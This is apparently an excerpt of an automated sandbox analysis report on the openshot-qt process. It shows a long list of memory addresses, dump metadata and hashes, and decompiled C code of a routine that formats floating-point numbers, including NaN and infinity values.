                                                                    0x0030648b
                                                                    0x00306490
                                                                    0x00306493
                                                                    0x00306497
                                                                    0x0030649a
                                                                    0x0030649f
                                                                    0x003064a3
                                                                    0x003064a8
                                                                    0x003064aa
                                                                    0x003064ac
                                                                    0x003067ec
                                                                    0x003067f0
                                                                    0x003067f2
                                                                    0x00306a4d
                                                                    0x00306a51
                                                                    0x00306a54
                                                                    0x00306a57
                                                                    0x00306a5b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003067f8
                                                                    0x003067f8
                                                                    0x003067f8
                                                                    0x003067f8
                                                                    0x00000000
                                                                    0x003067f8
                                                                    0x00000000
                                                                    0x003064b2
                                                                    0x003064b2
                                                                    0x003064b4
                                                                    0x003064b6
                                                                    0x003070c8
                                                                    0x003070cc
                                                                    0x003070cf
                                                                    0x003070d2
                                                                    0x003070d6
                                                                    0x00306a61
                                                                    0x00306a61
                                                                    0x00306a66
                                                                    0x00306a6b
                                                                    0x00306a6b
                                                                    0x003070d6
                                                                    0x003064bc
                                                                    0x003064c0
                                                                    0x003064c5
                                                                    0x003064c7
                                                                    0x003067fa
                                                                    0x003067fa
                                                                    0x003067fe
                                                                    0x00306801
                                                                    0x00306806
                                                                    0x00306806
                                                                    0x003064c7
                                                                    0x003064cd
                                                                    0x003064d1
                                                                    0x003064d5
                                                                    0x003064d8
                                                                    0x003064db
                                                                    0x003064dd
                                                                    0x003064e4
                                                                    0x003064e6
                                                                    0x003064e8
                                                                    0x003064ea
                                                                    0x003064ed
                                                                    0x003064f6
                                                                    0x003064f8
                                                                    0x003064f8
                                                                    0x003064ff
                                                                    0x00306503
                                                                    0x00306505
                                                                    0x00306507
                                                                    0x0030650b
                                                                    0x0030650f
                                                                    0x00306517
                                                                    0x00306517
                                                                    0x0030651b
                                                                    0x0030651f
                                                                    0x00306524
                                                                    0x00306527
                                                                    0x00306529
                                                                    0x00306ac8
                                                                    0x00306acc
                                                                    0x00306acf
                                                                    0x00306ad3
                                                                    0x00306ad7
                                                                    0x00306adc
                                                                    0x00306ae1
                                                                    0x00306ae3
                                                                    0x00000000
                                                                    0x00306ae9
                                                                    0x00306ae9
                                                                    0x00306aec
                                                                    0x00306af0
                                                                    0x00306af8
                                                                    0x00306b00
                                                                    0x00306b03
                                                                    0x00306b07
                                                                    0x00306b0c
                                                                    0x00306b11
                                                                    0x00306b15
                                                                    0x00306b17
                                                                    0x00306b1b
                                                                    0x00306b20
                                                                    0x00306b22
                                                                    0x00306b24
                                                                    0x0030729f
                                                                    0x003072a2
                                                                    0x003072aa
                                                                    0x003072b2
                                                                    0x003072b6
                                                                    0x003072bb
                                                                    0x003072c0
                                                                    0x003072c2
                                                                    0x003072c4
                                                                    0x00000000
                                                                    0x003072ca
                                                                    0x003072ca
                                                                    0x003072ce
                                                                    0x003072d2
                                                                    0x003072d6
                                                                    0x00000000
                                                                    0x003072d6
                                                                    0x00306b2a
                                                                    0x00306b2a
                                                                    0x00306b2c
                                                                    0x00307212
                                                                    0x00307212
                                                                    0x00307216
                                                                    0x0030721a
                                                                    0x0030721e
                                                                    0x00000000
                                                                    0x00306b32
                                                                    0x00306b32
                                                                    0x00306b36
                                                                    0x00306b3a
                                                                    0x00306b3e
                                                                    0x00000000
                                                                    0x00306b3e
                                                                    0x00306b2c
                                                                    0x00306b24
                                                                    0x0030652f
                                                                    0x0030652f
                                                                    0x0030652f
                                                                    0x00306533
                                                                    0x00306535
                                                                    0x00306810
                                                                    0x00306814
                                                                    0x00306817
                                                                    0x0030681b
                                                                    0x0030681f
                                                                    0x00306821
                                                                    0x00306b48
                                                                    0x00306b48
                                                                    0x00306b4c
                                                                    0x00306b50
                                                                    0x00306b54
                                                                    0x00306b5f
                                                                    0x00306b8a
                                                                    0x00306b8a
                                                                    0x00306b8e
                                                                    0x00306b91
                                                                    0x00306b94
                                                                    0x00306b99
                                                                    0x00306b9c
                                                                    0x00306b9f
                                                                    0x00306ba6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306b7b
                                                                    0x00306b80
                                                                    0x00306b80
                                                                    0x00306b80
                                                                    0x00306b88
                                                                    0x00306b88
                                                                    0x00306ba8
                                                                    0x00306bac
                                                                    0x00306bb0
                                                                    0x00306bb0
                                                                    0x00000000
                                                                    0x00306827
                                                                    0x00306827
                                                                    0x00306827
                                                                    0x0030682b
                                                                    0x0030682d
                                                                    0x0030682f
                                                                    0x00306832
                                                                    0x0030683b
                                                                    0x0030683b
                                                                    0x0030683d
                                                                    0x0030683f
                                                                    0x00306841
                                                                    0x00307084
                                                                    0x0030708a
                                                                    0x0030708f
                                                                    0x0030708f
                                                                    0x00307092
                                                                    0x00307094
                                                                    0x00307097
                                                                    0x0030709a
                                                                    0x003070a1
                                                                    0x003070a1
                                                                    0x003070a4
                                                                    0x003070a8
                                                                    0x003070ac
                                                                    0x003070b1
                                                                    0x003070b4
                                                                    0x003070c1
                                                                    0x003070c1
                                                                    0x00306847
                                                                    0x00306852
                                                                    0x00306856
                                                                    0x00306919
                                                                    0x00306919
                                                                    0x0030691d
                                                                    0x00306920
                                                                    0x00306924
                                                                    0x00306929
                                                                    0x0030692d
                                                                    0x00306930
                                                                    0x00306930
                                                                    0x00306933
                                                                    0x00306937
                                                                    0x0030693b
                                                                    0x00306940
                                                                    0x00306944
                                                                    0x00306946
                                                                    0x0030694a
                                                                    0x0030694d
                                                                    0x00306952
                                                                    0x00306954
                                                                    0x00306957
                                                                    0x00306959
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0030695f
                                                                    0x00306963
                                                                    0x00306966
                                                                    0x0030696a
                                                                    0x0030696f
                                                                    0x00306973
                                                                    0x0030697f
                                                                    0x00306983
                                                                    0x00306983
                                                                    0x00306987
                                                                    0x003073a8
                                                                    0x00000000
                                                                    0x0030698d
                                                                    0x0030698d
                                                                    0x00306991
                                                                    0x00306993
                                                                    0x00306995
                                                                    0x0030699c
                                                                    0x0030699c
                                                                    0x003069a0
                                                                    0x0030686d
                                                                    0x0030686d
                                                                    0x0030686f
                                                                    0x00306f30
                                                                    0x00306f30
                                                                    0x00306f34
                                                                    0x00306f38
                                                                    0x00306f3b
                                                                    0x00306f3d
                                                                    0x00306f3f
                                                                    0x00307196
                                                                    0x00307198
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306f45
                                                                    0x00306f45
                                                                    0x00306f49
                                                                    0x00307306
                                                                    0x00307309
                                                                    0x0030730b
                                                                    0x00000000
                                                                    0x00307311
                                                                    0x00307311
                                                                    0x00307313
                                                                    0x0030719a
                                                                    0x0030719a
                                                                    0x0030719d
                                                                    0x003071aa
                                                                    0x003071ac
                                                                    0x003071bc
                                                                    0x003071be
                                                                    0x00307349
                                                                    0x00307356
                                                                    0x00307356
                                                                    0x00000000
                                                                    0x0030734b
                                                                    0x0030734b
                                                                    0x00307350
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00307350
                                                                    0x003071c4
                                                                    0x003071c4
                                                                    0x003071c4
                                                                    0x003071c9
                                                                    0x00000000
                                                                    0x003071cb
                                                                    0x003071cb
                                                                    0x003071cf
                                                                    0x003071d7
                                                                    0x003071d7
                                                                    0x003071da
                                                                    0x003071de
                                                                    0x003071de
                                                                    0x003071e2
                                                                    0x00307322
                                                                    0x00307324
                                                                    0x00307326
                                                                    0x00307329
                                                                    0x0030732b
                                                                    0x0030737a
                                                                    0x0030737e
                                                                    0x0030732d
                                                                    0x0030732d
                                                                    0x0030732d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003071e2
                                                                    0x003071c9
                                                                    0x00307319
                                                                    0x00307319
                                                                    0x0030731b
                                                                    0x00000000
                                                                    0x0030731b
                                                                    0x00307313
                                                                    0x00306f4f
                                                                    0x00306f4f
                                                                    0x00306f4f
                                                                    0x00306f54
                                                                    0x003071e8
                                                                    0x003071e8
                                                                    0x003071ea
                                                                    0x003071f2
                                                                    0x00000000
                                                                    0x00306f5a
                                                                    0x00306f5a
                                                                    0x00306f5c
                                                                    0x00306fc7
                                                                    0x00306fc7
                                                                    0x00306fd2
                                                                    0x00306fd7
                                                                    0x00306fd9
                                                                    0x00306fdb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306f60
                                                                    0x00306f65
                                                                    0x00306f7b
                                                                    0x00306f80
                                                                    0x00306f83
                                                                    0x00306f85
                                                                    0x00306f8d
                                                                    0x00306f90
                                                                    0x00306f98
                                                                    0x00306fa1
                                                                    0x00306fa3
                                                                    0x00306fa7
                                                                    0x00306faa
                                                                    0x00306fae
                                                                    0x00306fb3
                                                                    0x00306fb7
                                                                    0x00306fbb
                                                                    0x00306fbe
                                                                    0x00306fbe
                                                                    0x00306fc1
                                                                    0x00306fc5
                                                                    0x00306fc5
                                                                    0x00306fdd
                                                                    0x00306fe1
                                                                    0x00306fe3
                                                                    0x00306fe5
                                                                    0x00306fe8
                                                                    0x00000000
                                                                    0x00306fee
                                                                    0x00306fee
                                                                    0x00306fee
                                                                    0x00306ff1
                                                                    0x00306ff9
                                                                    0x00306ffb
                                                                    0x00306ffd
                                                                    0x00307001
                                                                    0x00307001
                                                                    0x00307005
                                                                    0x0030700a
                                                                    0x0030700a
                                                                    0x00306fe8
                                                                    0x00306f54
                                                                    0x00306f49
                                                                    0x00306875
                                                                    0x00306875
                                                                    0x00306875
                                                                    0x00306879
                                                                    0x00306888
                                                                    0x00306888
                                                                    0x0030688c
                                                                    0x0030688f
                                                                    0x00306891
                                                                    0x0030689e
                                                                    0x0030689e
                                                                    0x003068a3
                                                                    0x003068a6
                                                                    0x003068aa
                                                                    0x003068b1
                                                                    0x0030712a
                                                                    0x0030712c
                                                                    0x00306bb2
                                                                    0x00306bb2
                                                                    0x00306bb6
                                                                    0x00306bb8
                                                                    0x00306d8d
                                                                    0x00306d90
                                                                    0x00306d98
                                                                    0x00306da1
                                                                    0x00306da3
                                                                    0x00306dae
                                                                    0x00306db3
                                                                    0x00306db7
                                                                    0x00306db9
                                                                    0x00306dbd
                                                                    0x00000000
                                                                    0x00306dc3
                                                                    0x00306dc3
                                                                    0x00306dd0
                                                                    0x00306dd0
                                                                    0x00000000
                                                                    0x00306dc5
                                                                    0x00306dc5
                                                                    0x00306dca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306dca
                                                                    0x00306dc3
                                                                    0x00306bbe
                                                                    0x00306bbe
                                                                    0x00306bc1
                                                                    0x00306bc5
                                                                    0x00306bc8
                                                                    0x00306dd3
                                                                    0x00306dd3
                                                                    0x00306dd6
                                                                    0x003072df
                                                                    0x003072e2
                                                                    0x003072e7
                                                                    0x003072e9
                                                                    0x003072ee
                                                                    0x00306ddc
                                                                    0x00306ddc
                                                                    0x00306ddc
                                                                    0x00000000
                                                                    0x00306bce
                                                                    0x00306bce
                                                                    0x00306bd1
                                                                    0x00306bda
                                                                    0x00306bda
                                                                    0x00000000
                                                                    0x00306bd3
                                                                    0x00306bd3
                                                                    0x00306bd6
                                                                    0x00306bd8
                                                                    0x00306c16
                                                                    0x00306c16
                                                                    0x00306c16
                                                                    0x00306c19
                                                                    0x00306c1b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306c10
                                                                    0x00306c14
                                                                    0x00306c14
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306bd8
                                                                    0x00306bd1
                                                                    0x00306bc8
                                                                    0x003068b7
                                                                    0x003068ca
                                                                    0x003068cf
                                                                    0x003068d7
                                                                    0x003068df
                                                                    0x003068e1
                                                                    0x003068e4
                                                                    0x003068e6
                                                                    0x00306a30
                                                                    0x00306a35
                                                                    0x00306a37
                                                                    0x003068ec
                                                                    0x003068ec
                                                                    0x003068f1
                                                                    0x003068f4
                                                                    0x003068fc
                                                                    0x003068fe
                                                                    0x0030690b
                                                                    0x0030690b
                                                                    0x0030690d
                                                                    0x0030690d
                                                                    0x0030690d
                                                                    0x00306915
                                                                    0x00000000
                                                                    0x00306915
                                                                    0x00306893
                                                                    0x00306893
                                                                    0x00306898
                                                                    0x00307100
                                                                    0x00307105
                                                                    0x00000000
                                                                    0x0030710b
                                                                    0x0030710b
                                                                    0x00307110
                                                                    0x00307114
                                                                    0x00307116
                                                                    0x0030711e
                                                                    0x00307120
                                                                    0x00307123
                                                                    0x00307123
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306898
                                                                    0x0030687b
                                                                    0x0030687b
                                                                    0x0030687f
                                                                    0x00306882
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306882
                                                                    0x00306879
                                                                    0x003069a6
                                                                    0x003069a6
                                                                    0x003069aa
                                                                    0x003069af
                                                                    0x003069b1
                                                                    0x003069b4
                                                                    0x003071f9
                                                                    0x003071f9
                                                                    0x003071fd
                                                                    0x003071ff
                                                                    0x00307201
                                                                    0x00307205
                                                                    0x00307208
                                                                    0x00306bee
                                                                    0x00306bee
                                                                    0x00306bee
                                                                    0x00306bf1
                                                                    0x00306bf3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306be0
                                                                    0x00306be2
                                                                    0x00306d74
                                                                    0x00306d78
                                                                    0x00306d7d
                                                                    0x00306d85
                                                                    0x00306be8
                                                                    0x00306be8
                                                                    0x00306bec
                                                                    0x00000000
                                                                    0x00306bec
                                                                    0x00000000
                                                                    0x00306be2
                                                                    0x00306bf5
                                                                    0x00306bf8
                                                                    0x00306c00
                                                                    0x003069ba
                                                                    0x003069ba
                                                                    0x003069bc
                                                                    0x00307387
                                                                    0x0030738b
                                                                    0x00307397
                                                                    0x0030739b
                                                                    0x003073a0
                                                                    0x0030738d
                                                                    0x0030738d
                                                                    0x0030738d
                                                                    0x003069c2
                                                                    0x003069c2
                                                                    0x003069c6
                                                                    0x003069c6
                                                                    0x003069c9
                                                                    0x003069cd
                                                                    0x003069cd
                                                                    0x003069d2
                                                                    0x003069d7
                                                                    0x003069db
                                                                    0x003069df
                                                                    0x003069e1
                                                                    0x003069e3
                                                                    0x003069e3
                                                                    0x003069b4
                                                                    0x003069a0
                                                                    0x00000000
                                                                    0x00306860
                                                                    0x00306863
                                                                    0x00306868
                                                                    0x00000000
                                                                    0x00306868
                                                                    0x00306919
                                                                    0x003069e8
                                                                    0x003069e8
                                                                    0x003069ec
                                                                    0x003069f3
                                                                    0x003069f8
                                                                    0x003069fa
                                                                    0x00306d52
                                                                    0x00306d56
                                                                    0x00306a00
                                                                    0x00306a00
                                                                    0x00306a04
                                                                    0x00306a06
                                                                    0x00307227
                                                                    0x00307227
                                                                    0x0030722b
                                                                    0x00000000
                                                                    0x00306a0c
                                                                    0x00306a0c
                                                                    0x00306a0e
                                                                    0x00000000
                                                                    0x00306a14
                                                                    0x00306a17
                                                                    0x00306a1c
                                                                    0x00306a20
                                                                    0x00000000
                                                                    0x00306a20
                                                                    0x00306a0e
                                                                    0x00000000
                                                                    0x00306a06
                                                                    0x0030653b
                                                                    0x0030653b
                                                                    0x0030653d
                                                                    0x00000000
                                                                    0x00306543
                                                                    0x00306543
                                                                    0x00306543
                                                                    0x00306547
                                                                    0x00306549
                                                                    0x00000000
                                                                    0x0030654f
                                                                    0x0030654f
                                                                    0x00306566
                                                                    0x0030656b
                                                                    0x0030656e
                                                                    0x00306572
                                                                    0x00306576
                                                                    0x0030657b
                                                                    0x0030657d
                                                                    0x00000000
                                                                    0x00306583
                                                                    0x00306583
                                                                    0x00306587
                                                                    0x0030658b
                                                                    0x0030658b
                                                                    0x0030658e
                                                                    0x00000000
                                                                    0x0030658e
                                                                    0x0030657d
                                                                    0x00000000
                                                                    0x00306549
                                                                    0x0030653d
                                                                    0x00306535
                                                                    0x00000000
                                                                    0x00306529
                                                                    0x00000000
                                                                    0x003066ec
                                                                    0x003066ec
                                                                    0x003066f0
                                                                    0x003066f4
                                                                    0x003066f7
                                                                    0x00000000
                                                                    0x003066fd
                                                                    0x003066fd
                                                                    0x00306701
                                                                    0x00306708
                                                                    0x0030670a
                                                                    0x00306c75
                                                                    0x00306c75
                                                                    0x00306c7c
                                                                    0x00306c80
                                                                    0x00306c84
                                                                    0x00306c8f
                                                                    0x00306c93
                                                                    0x00306c9b
                                                                    0x00306c9e
                                                                    0x00306ca0
                                                                    0x00306ca4
                                                                    0x00306ca6
                                                                    0x00306ca9
                                                                    0x00306cb1
                                                                    0x00306cb4
                                                                    0x00306cbb
                                                                    0x00306cbf
                                                                    0x00306cc6
                                                                    0x00306ccf
                                                                    0x00306ccf
                                                                    0x00306cd2
                                                                    0x00306cd4
                                                                    0x00306cd6
                                                                    0x00306cd8
                                                                    0x00306cda
                                                                    0x00306cdc
                                                                    0x00306cde
                                                                    0x00306ce0
                                                                    0x00306d3f
                                                                    0x00306d3f
                                                                    0x00000000
                                                                    0x00306d41
                                                                    0x00306d41
                                                                    0x00306d43
                                                                    0x00306d45
                                                                    0x00306d49
                                                                    0x00306d49
                                                                    0x00306ce8
                                                                    0x00306ce8
                                                                    0x00306ce8
                                                                    0x00306ce8
                                                                    0x00306cef
                                                                    0x00306cf3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306cf9
                                                                    0x00306cff
                                                                    0x00306d02
                                                                    0x00306d02
                                                                    0x00306d05
                                                                    0x00306d0e
                                                                    0x00306d10
                                                                    0x00306d17
                                                                    0x00306d1b
                                                                    0x00306d22
                                                                    0x00306d2b
                                                                    0x00306d2b
                                                                    0x00306d2e
                                                                    0x00306d30
                                                                    0x00306d33
                                                                    0x00306d35
                                                                    0x00306d37
                                                                    0x00306d39
                                                                    0x00306d3b
                                                                    0x00306d3d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306d3d
                                                                    0x00306de9
                                                                    0x00306ded
                                                                    0x00306def
                                                                    0x0030726d
                                                                    0x0030726f
                                                                    0x00307273
                                                                    0x00307275
                                                                    0x0030733a
                                                                    0x0030733c
                                                                    0x0030733e
                                                                    0x00307342
                                                                    0x00000000
                                                                    0x0030727b
                                                                    0x0030727b
                                                                    0x0030727d
                                                                    0x0030727f
                                                                    0x00307283
                                                                    0x00307292
                                                                    0x00307292
                                                                    0x00306f18
                                                                    0x00306f18
                                                                    0x00306f18
                                                                    0x00306f1a
                                                                    0x00306f1d
                                                                    0x00306f1d
                                                                    0x00306f23
                                                                    0x00306f27
                                                                    0x00307287
                                                                    0x00307287
                                                                    0x0030728c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0030728c
                                                                    0x00307283
                                                                    0x00306df5
                                                                    0x00306df5
                                                                    0x00306df7
                                                                    0x00306df9
                                                                    0x00306dfc
                                                                    0x003072f7
                                                                    0x003072fb
                                                                    0x003072ff
                                                                    0x00306290
                                                                    0x00306290
                                                                    0x00306293
                                                                    0x00306296
                                                                    0x00307133
                                                                    0x00307137
                                                                    0x0030629c
                                                                    0x0030629c
                                                                    0x0030629e
                                                                    0x00307183
                                                                    0x00307188
                                                                    0x0030718d
                                                                    0x00307191
                                                                    0x003062a4
                                                                    0x003062a4
                                                                    0x003062a8
                                                                    0x003062a8
                                                                    0x00000000
                                                                    0x003062a8
                                                                    0x0030629e
                                                                    0x0030713a
                                                                    0x0030713c
                                                                    0x00306e02
                                                                    0x00306e02
                                                                    0x00306e06
                                                                    0x00306e10
                                                                    0x00306e10
                                                                    0x00306e10
                                                                    0x00306dfc
                                                                    0x00306def
                                                                    0x00306710
                                                                    0x00306710
                                                                    0x00306714
                                                                    0x00306716
                                                                    0x00000000
                                                                    0x0030671c
                                                                    0x0030671c
                                                                    0x003067af
                                                                    0x00000000
                                                                    0x00306722
                                                                    0x00306728
                                                                    0x0030672c
                                                                    0x0030672e
                                                                    0x00306730
                                                                    0x00306732
                                                                    0x003067b1
                                                                    0x003067b1
                                                                    0x003067b9
                                                                    0x003067b9
                                                                    0x003067bb
                                                                    0x003067bb
                                                                    0x003067bf
                                                                    0x003067c3
                                                                    0x003067cb
                                                                    0x003067cd
                                                                    0x00000000
                                                                    0x00306734
                                                                    0x00306734
                                                                    0x00306737
                                                                    0x0030673f
                                                                    0x00306743
                                                                    0x00306592
                                                                    0x00306592
                                                                    0x00306592
                                                                    0x00306592
                                                                    0x00306597
                                                                    0x0030659a
                                                                    0x003065a2
                                                                    0x003065a9
                                                                    0x003065ae
                                                                    0x003065b0
                                                                    0x003065b2
                                                                    0x003065b5
                                                                    0x003065b5
                                                                    0x00000000
                                                                    0x003065b0
                                                                    0x00306732
                                                                    0x00000000
                                                                    0x0030671c
                                                                    0x00306716
                                                                    0x0030670a
                                                                    0x003066f7
                                                                    0x00306105
                                                                    0x0030610a
                                                                    0x0030610a
                                                                    0x0030610c
                                                                    0x00000000
                                                                    0x0030610c
                                                                    0x003060ff
                                                                    0x003060e6
                                                                    0x0030608b
                                                                    0x00306082
                                                                    0x00306079
                                                                    0x00000000
                                                                    0x0030604b
                                                                    0x00000000
                                                                    0x00305e1b
                                                                    0x00305de5
                                                                    0x00305dea
                                                                    0x00305ded
                                                                    0x00305df3
                                                                    0x00305df3
                                                                    0x00305df5
                                                                    0x00000000
                                                                    0x00305da0
                                                                    0x00305da0
                                                                    0x00305da2
                                                                    0x00305da5
                                                                    0x00305da8
                                                                    0x00305dab
                                                                    0x00305dad
                                                                    0x00000000
                                                                    0x00305daf
                                                                    0x00305daf
                                                                    0x00305db3
                                                                    0x00305db7
                                                                    0x00305dba
                                                                    0x00305dbd
                                                                    0x00305dc0
                                                                    0x00305dc2
                                                                    0x00305dc7
                                                                    0x00305dca
                                                                    0x00305dca
                                                                    0x00000000
                                                                    0x00305d08
                                                                    0x00305d08
                                                                    0x00305d08
                                                                    0x00305d0e
                                                                    0x00305d10
                                                                    0x00305d11
                                                                    0x00305d12
                                                                    0x00305d13
                                                                    0x00305d14
                                                                    0x00305d14
                                                                    0x00305d06
                                                                    0x00305cf8
                                                                    0x00305cf4
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ $9$Infinity$NaN
                                                                    • API String ID: 0-2156819404
                                                                    • Opcode ID: b2800ac2b9c5d8e4451af20dd4813bed8928647250876b0295c79ebfcb598863
                                                                    • Instruction ID: 4d8a65d5f23399178c0923dbe8d3ccf0a178dd062a4adfdb3123dd6287cadbf7
                                                                    • Opcode Fuzzy Hash: b2800ac2b9c5d8e4451af20dd4813bed8928647250876b0295c79ebfcb598863
                                                                    • Instruction Fuzzy Hash: 44D242B1A0E3818FD722DF29C0A571ABBE0BB84354F15891DE8C58B395E771E854CF82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E003048C0(signed int __eax) {
                                                                    				char _v31;
                                                                    				char _v32;
                                                                    				char _v51;
                                                                    				char _v52;
                                                                    				signed int _v56;
                                                                    				signed int _v60;
                                                                    				signed int _v64;
                                                                    				signed int _v68;
                                                                    				signed short _v84;
                                                                    				signed int _v104;
                                                                    				signed int _v108;
                                                                    				signed int _v112;
                                                                    				signed short _v114;
                                                                    				signed int _v120;
                                                                    				signed int _v124;
                                                                    				signed int _v128;
                                                                    				signed int _v132;
                                                                    				signed int _v136;
                                                                    				signed int _v156;
                                                                    				signed int _v160;
                                                                    				signed int _v164;
                                                                    				signed int _v168;
                                                                    				signed int __ebx;
                                                                    				signed int __edi;
                                                                    				signed int __esi;
                                                                    				signed int __ebp;
                                                                    				signed short _t202;
                                                                    				signed int _t209;
                                                                    				signed int _t210;
                                                                    				char** _t211;
                                                                    				char* _t212;
                                                                    				char* _t214;
                                                                    				void* _t215;
                                                                    				char* _t219;
                                                                    				char** _t223;
                                                                    				void* _t224;
                                                                    				void* _t225;
                                                                    				void* _t233;
                                                                    
                                                                    				_t208 = __eax;
                                                                    				_t225 = _t224 - 0x9c;
                                                                    				_t233 = [tword [esp+0xb0];
                                                                    				asm("fxam");
                                                                    				asm("wait");
                                                                    				asm("fnstsw ax");
                                                                    				_t202 = __eax & 0x00004500;
                                                                    				if(_t202 == 0x100) {
                                                                    					st0 = _t233;
                                                                    					_t225 = _t225 + 0x9c;
                                                                    					_t211 = __eax;
                                                                    					_t214 = "NaN";
                                                                    					_t202 = 0;
                                                                    					_pop(_t220);
                                                                    					_pop(_t218);
                                                                    					_pop(_t222);
                                                                    					goto L1;
                                                                    				} else {
                                                                    					__fp0 = st0;
                                                                    					[tword [esp+0x50] = __fp0;
                                                                    					__edx = _v84 & 0x0000ffff;
                                                                    					if(__dx < 0) {
                                                                    						 *(__ebx + 4) =  *(__ebx + 4) | 0x00000080;
                                                                    					}
                                                                    					asm("fxam");
                                                                    					asm("wait");
                                                                    					asm("fnstsw ax");
                                                                    					__ax = __ax & 0x00004500;
                                                                    					if(__ax == 0x500) {
                                                                    						st0 = __fp0;
                                                                    						__esp =  &(__esp[0x27]);
                                                                    						__eax = __edx;
                                                                    						__ecx = __ebx;
                                                                    						__edx = "Inf";
                                                                    						_pop(__ebx);
                                                                    						__eax = __eax & 0x00008000;
                                                                    						_pop(__esi);
                                                                    						_pop(__edi);
                                                                    						_pop(__ebp);
                                                                    						L1:
                                                                    						_t223 = _t211;
                                                                    						_t219 = _t214;
                                                                    						 *(_t211 + 0xc) = 0xffffffff;
                                                                    						_t209 =  *(_t211 + 4);
                                                                    						if(_t202 == 0) {
                                                                    							if((_t209 & 0x00000001) == 0) {
                                                                    								if((_t209 & 0x00000040) == 0) {
                                                                    									_t221 =  &_v32;
                                                                    									_t212 =  &_v32;
                                                                    								} else {
                                                                    									_v32 = 0x20;
                                                                    									_t212 =  &_v31;
                                                                    									_t221 =  &_v32;
                                                                    								}
                                                                    							} else {
                                                                    								_v32 = 0x2b;
                                                                    								_t212 =  &_v31;
                                                                    								_t221 =  &_v32;
                                                                    							}
                                                                    						} else {
                                                                    							_v32 = 0x2d;
                                                                    							_t212 =  &_v31;
                                                                    							_t221 =  &_v32;
                                                                    						}
                                                                    						_t210 = _t209 & 0x00000020;
                                                                    						_t215 = 0;
                                                                    						goto L4;
                                                                    						L4:
                                                                    						 *((char*)(_t212 + _t215)) = _t219[_t215] & 0xdf | _t210;
                                                                    						_t215 = _t215 + 1;
                                                                    						if(_t215 != 3) {
                                                                    							goto L4;
                                                                    						} else {
                                                                    							return E00303140(_t221, _t223, _t212 + 3 - _t221);
                                                                    						}
                                                                    					} else {
                                                                    						__dx = __dx & 0x00007fff;
                                                                    						[tword [esp+0x40] = __fp0;
                                                                    						__edi = _v108;
                                                                    						__ebp = _v104;
                                                                    						_v124 = __dx;
                                                                    						if(__dx != 0) {
                                                                    							__eax =  *(__ebx + 0xc);
                                                                    							_v124 = _v124 - 0x3fff;
                                                                    							_v136 = __eax;
                                                                    							if(__eax <= 0xe) {
                                                                    								goto L47;
                                                                    							} else {
                                                                    								__eax =  *(__ebx + 4);
                                                                    								__ebp = __ebp | __edi;
                                                                    								_v128 =  *(__ebx + 4);
                                                                    								if((__ebp | __edi) != 0) {
                                                                    									goto L52;
                                                                    								} else {
                                                                    									goto L17;
                                                                    								}
                                                                    							}
                                                                    							goto L66;
                                                                    						} else {
                                                                    							__ebp = __ebp | __edi;
                                                                    							if((__ebp | __edi) != 0) {
                                                                    								if(__ebp < 0) {
                                                                    									__eax = 0xffffc002;
                                                                    									_v124 = __ax;
                                                                    								} else {
                                                                    									__eax = 0xffffc001;
                                                                    									do {
                                                                    										__ebp = (__ebp << 0x00000020 | __edi) << 1;
                                                                    										__edx = __eax;
                                                                    										__edi = __edi + __edi;
                                                                    										__eax = __eax - 1;
                                                                    									} while (__ebp >= 0);
                                                                    									_v124 = __dx;
                                                                    								}
                                                                    								__eax =  *(__ebx + 0xc);
                                                                    								_v136 = __eax;
                                                                    								if(__eax > 0xe) {
                                                                    									goto L51;
                                                                    								} else {
                                                                    									goto L48;
                                                                    								}
                                                                    								goto L103;
                                                                    							} else {
                                                                    								__eax =  *(__ebx + 0xc);
                                                                    								_v136 = __eax;
                                                                    								if(__eax <= 0xe) {
                                                                    									L46:
                                                                    									__ebp = (__ebp << 0x00000020 | __edi) << 1;
                                                                    									__edi = __edi + __edi;
                                                                    									L47:
                                                                    									if(__ebp >= 0) {
                                                                    										goto L46;
                                                                    									}
                                                                    									L48:
                                                                    									0xe = 0xe - _v136;
                                                                    									__eax = 4;
                                                                    									__edx = 0;
                                                                    									__ecx = 0xe - _v136 << 2;
                                                                    									__esi = 0;
                                                                    									__edx = 0xbadbad << __cl;
                                                                    									__eax = 4 << __cl;
                                                                    									__edx =  !=  ? 4 : 0xbadbad << __cl;
